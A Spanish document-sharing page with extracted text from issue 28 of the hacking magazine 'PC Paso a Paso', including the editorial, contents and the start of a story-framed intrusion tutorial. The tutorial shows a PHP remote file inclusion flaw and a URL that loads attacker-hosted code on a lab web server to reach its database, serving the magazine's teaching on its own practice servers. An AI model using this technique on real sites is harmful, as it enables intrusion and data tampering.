PDF de programación - PC Paso a Paso - 28

Imágen de pdf PC Paso a Paso - 28

PC Paso a Paso - 28gráfica de visualizaciones

Actualizado el 21 de Marzo del 2018 (Publicado el 18 de Marzo del 2018)
720 visualizaciones desde el 18 de Marzo del 2018
11,3 MB
68 paginas
Creado hace 19a (01/04/2005)
82000

8 4 1 4 0 9 0 2 0 2 7 5 6

EDITORIAL
ORIAL
EDIT

DESPEGA LA SEGUNDA ETAPA DEL PROYECTO HXC.

MUCHOS CAMBIOS Y UNA AMENAZA: LA “LEY MORDAZA”

Estimados amigos de Hack x Crack, esta es la segunda vez que tengo el
placer de escribir esta editorial.

Tienes ante ti el número 28 de PC PASO A PASO // Los Cuadernos de
hackxcrack, el segundo número de la nueva etapa de esta revista. En la
anterior editorial te anunciábamos que toda una serie de cambios estaban
en camino, pues bien, muchos de esos cambios ya son perfectamente
visibles y otros muchos están en el punto de mira.

El primer cambio, el más importante, el motor, el que ha permitido que este
número esté en tus manos y contenga importantes mejoras… es un cambio
que no "se ve", es la apertura del proyecto HXC. Esta publicación ya no
es responsabilidad de un director y unos pocos colaboradores directos, el
proyecto HXC se ha abierto y ahora somos muchas las personas que
estamos colaborando, aportando nuestros conocimientos (cuanto creemos
saber), nuestro talento (si es que tenemos alguno), nuestro tiempo (muchas
horas robadas al sueño) y, en definitiva, empujando cuanto podemos y
utilizando todos los recursos que hay a nuestro alcance.

El segundo cambio, la cabecera de La Portada (cambio de "logo"),
portada en sí misma y reestructuración completa de la maquetación
interna. Hace mucho tiempo que teníamos pendiente mejorar el aspecto
de la revista, por fin, gracias al talento, a las aportaciones y al trabajo de
muchas personas, aquí está el primer resultado. Seguiremos avanzando
en este campo, intentaremos mejorar en cada nuevo número.

El tercer cambio, reactivación los servidores de pruebas (servidores
de hack) para que puedas hacer las prácticas propuestas en la revista
sin temor a incumplir la Ley. Este punto ha sido una cruz para esta revista,
en su día se montaron los servidores PERO estaban más tiempo fuera de
servicio que ON LINE. Bien, hemos trabajado mucho para encontrar una
solución factible y finalmente creemos haberla encontrado. En este número
hemos habilitado 4 servidores (dos escenarios completos) para que puedas
completar la práctica propuesta en el primer artículo: HACKING
ESTRATEGIA. Visita nuestro foro y en concreto el enlace
http://www.hackxcrack.com/phpBB2/viewtopic.php?t=23301
En este enlace tienes toda la información necesaria sobre los Servidores
de Hack del Proyecto HXC.

El cuarto cambio y caminando en la dirección de hacer HXC lo más abierto
posible, se ha "construido" en el foro (www.hackxcrack.com) una "Sala de
Votaciones" donde ya se ha propuesto y resuelto la primera votación: la
portada de este número 28 NO fue decidida por ningún director, fue decidida
por todos los integrantes del foro. No te pierdas la oportunidad de votar y
decidir sobre la revista, regístrate en el foro y utiliza tu voto para que HXC
llegue a ser como tú deseas.

Muchos cambios, si, muchos avances, si, muchas cosas buenas, si… pero
todavía hay muchos temas pendientes en los que ya estamos trabajando
y que esperamos presentarte para el próximo número, estamos poniendo
todo nuestro empeño. Trabajaremos en la Web, en la organización interna,
en la atención telefónica, en los pedidos, en la publicidad (imprescindible
si queremos aumentar las páginas de la revista) y, entre otras cosas, crear
un sistema de Bandeja de Entrada compartida desde donde podremos
responder TODOS los mails que nos lleguen… ¿no te lo crees?... tiempo
al tiempo, ahora tenemos "el poder" que ofrece el trabajo en grupo. Si
conseguimos organizarnos bien, todo eso y mucho más será posible ;)

Hay mucho por hacer, mucho!!! Pero con la ayuda del grupo que estamos
formando, parte de cuyo esfuerzo ya puedes ver reflejado en este número,
iremos consiguiendo cada una de las metas.

Y recuerda algo muy importante… nosotros sin ti, NO SOMOS NADA!!!

¡Un fuerte abrazo a todos!

AZIMUT, administrador de los foros de hackxcrack
(www.hackxcrack.com).

P.D: Los artículos publicados este mes han precisado de
consulta/asesoramiento externo debido a que una nueva ley intenta
silenciarnos (silenciarnos a nosotros, a ti y a cualquier medio de
comunicación). La llamada LEY MORDAZA es un atentado contra la
libertad de expresión que puede provocar condenas de cárcel en
España por el mero hecho de IMFORMAR. Al final de la revista tienes
la explicación a esta posdata en forma de artículo de opinión.

1.- PORTADA
2.- EDITORIAL - INDICE - DATOS
3.- HACKING ESTRATEGIA
10.- CURSO DE PYTHON
15.- PONIENDO A PRUEBA EL ANTIVIRUS
34.- EXPLOTANDO HEAP/BBS OVERFLOWS
42.- ¿QUIERES ESCRIBIR PARA ESTA REVISTA?
43.- CURSO DE C
52.- TALLER DE CRIPTOGRAFIA
61.- VISITA NUESTRO FORO
62.- LA LEY MORDAZA: INFORMAR ES DELITO
66.- ATENCION AL CLIENTE
67.- PON PUBLICIDAD EN LA REVISTA POR 99 EUROS
68.- PIDE LOS NUMEROS ATRADOS

Moleman, a.k.a Héctor M. ---> [email protected]
Ramiro C.G. (alias Death Master) // Alex F. (CrashCool)

“ t a c a d i s s e n y s ”

[email protected]

g r u p o H X C

j u a n m a t

EDITOTRANS S.L.
B43675701
PERE MARTELL Nº 20, 2º - 1ª
43001 TARRAGONA (ESPAÑA)

Director Editorial
I. SENTIS
E-mail contacto
[email protected]
Título de la publicación
Los Cuadernos de HACK X CRACK.
Nombre Comercial de la publicacíón
PC PASO A PASO
Web: www.hackxcrack.com
IMPRIME:
I.G. PRINTONE S.A. Tel 91 808 50 15
DISTRIBUCIÓN:
SGEL, Avda. Valdeparra 29 (Pol. Ind.)
28018 ALCOBENDAS (MADRID)
Tel 91 657 69 00 FAX 91 657 69 28
WEB: www.sgel.es

© Copyright Editotrans S.L.

NUMERO 28 -- PRINTED IN SPAIN

PERIOCIDAD MENSUAL

Deposito legal: B.26805-2002
Código EAN: 8414090202756

Bienvenidos a esta serie de artículos en los que aprenderemos diversas técnicas de intrusión usadas
en la realidad bajo un marco de suspense y con una trama y escenarios ficticios que te situarán
junto al atacante, nos convertiremos en agentes especiales y se nos entregará una misión que

deberemos llevarla al éxito.

Soy CrashCool y os doy la bienvenida a hacking de estrategia. ;)

Documento de la misión:

Necesitamos que altere la base de datos de WADAL SL y modifique la dirección de entrega de un pedido que sospe­
chamos es ilegal, deberá modificar el lugar de entrega para que podamos tenderle allí una trampa y capturar a
Wadalberto, jefe de WADAL SL y principal sospechoso

A continuación le doy los datos técnicos que nuestros agentes han conseguido:

Tanto el sistema de pedidos como la Web de la compañía comparten el mismo servidor de bases de datos, solo
es posible acceder a dicho servidor desde las propias oficinas de la empresa o desde el servidor Web donde se
aloja la página de la empresa, ambos servidores corren Linux como sistema operativo.

El pedido se entregará el día 12/05/05,el lugar y hora de entrega es desconocido y deberá averiguarlo, segui­
damente deberá modificarlo siendo el nuevo destino: C\Secreta N 99 – Wadalbertia

La Web de WADAL SL se encuentra en http://172.16.1.2

Mucha suerte en su misión

1- Trazando el esquema de ataque

Tenemos que infiltrarnos en el servidor de bases de datos,
la única manera de hacerlo es desde el servidor Web o
desde las oficinas de WADAL SL.

Deslizarnos desde un helicóptero por la rejilla de
ventilación del edificio de WADAL.SL para acceder a las ofi­
cinas y procurar que no se nos caiga la gota de sudor al

suelo, se lo dejaremos a Tom Cruise, nosotros vamos a in­
tentar infiltrarnos en la base de datos desde el servidor
Web.

El escenario se nos presenta así: (ver imagen 1)
Lo que haremos será lo siguiente:


Nos infiltraremos en el servidor Web
A través de ahí conectaremos con el servidor

BBDD

3

mos resultados, auditaremos cada uno de
los servicios que corra el servidor.

Vistamos la Web para comenzar la audi­
toria de la aplicación.

http://172.16.1.2 (ver imagen 2)

Visitamos las distintas secciones de la
Web y nos fijamos en el enlace de cada
sección:

http://172.16.1.2/index.php?seccion=i
nicio.html

http://172.16.1.2/index.php?seccion=
empresa.html

http://172.16.1.2/index.php?seccion=
procuctos.html

http://172.16.1.2/index.php?seccion=
contacto.html

Esto nos hace sospechar que nos en­
contramos ante un peligroso error de
programación, más conocido como re­
mote file inclusión , la base de este bug
es la inclusión de un archivo en el códi-
go de la Web, el cual se ejecutará en el
propio servidor.

Podemos deducir que en el código de
index.php encontraremos en alguna
parte algo parecido a esto:

<?php
include($_GET['seccion']);
?>

Como podemos ver seccion es una va­
riable que se recoge con GET y se inclu­
ye el nombre del archivo que contenga.
Así pues, esto:

http://172.16.1.2/index.php?seccion=
empresa.html

equivaldría a:

<?php
include('empresa.html');
?>

La sentencia include de PHP permite por
defecto incluir archivos remotos, si
montáramos un servidor Web en nues­
tro PC http://172.16.1.45 y guardára­
mos empresa.html en el directorio raíz
de nuestro servidor, al acceder a:
http://172.16.1.2/index.php?seccion=
http://172.16.1.45/empresa.html no

Imagen 1

Imagen 2

Visualizaremos las bases de da­
tos alojadas para seleccionar la
que nos resulte sospechosa de
ser la encargada de alojar los pe­
didos.

Visualizaremos las tablas de esa
base de datos y haremos una
consulta a dicha tabla para visua­
lizar su contenido

4

Alteraremos la tabla y finaliza­

remos el ataque.

2- Preparando el ataque

Lo primero que haremos será una audito­
ria al servidor, para ello primero auditare­
mos la aplicación Web y si no consegui­

notaríamos diferencia alguna que acce­
der por http://172.16.1.2/index.php?
seccion=empresa.html , pero si vamos
más allá, ¿Qué pasaría si creamos un
script en PHP? el código que programe­
mos se ejecutaría en el servidor Web.

2.1 Diseñando los scripts para la
misión

Una vez que podemos ejecutar código
arbitrario dentro del servidor, tenemos
acceso a él, y por tanto al servidor
BBDD.

Sabemos que la Web comparte el mis­
mo servidor de bases de datos que con­
tiene el pedido que tenemos
  • Links de descarga
http://lwp-l.com/pdf9648

Comentarios de: PC Paso a Paso - 28 (0)


No hay comentarios
 

Comentar...

Nombre
Correo (no se visualiza en la web)
Valoración
Comentarios...
CerrarCerrar
CerrarCerrar
Cerrar

Tienes que ser un usuario registrado para poder insertar imágenes, archivos y/o videos.

Puedes registrarte o validarte desde aquí.

Codigo
Negrita
Subrayado
Tachado
Cursiva
Insertar enlace
Imagen externa
Emoticon
Tabular
Centrar
Titulo
Linea
Disminuir
Aumentar
Vista preliminar
sonreir
dientes
lengua
guiño
enfadado
confundido
llorar
avergonzado
sorprendido
triste
sol
estrella
jarra
camara
taza de cafe
email
beso
bombilla
amor
mal
bien
Es necesario revisar y aceptar las políticas de privacidad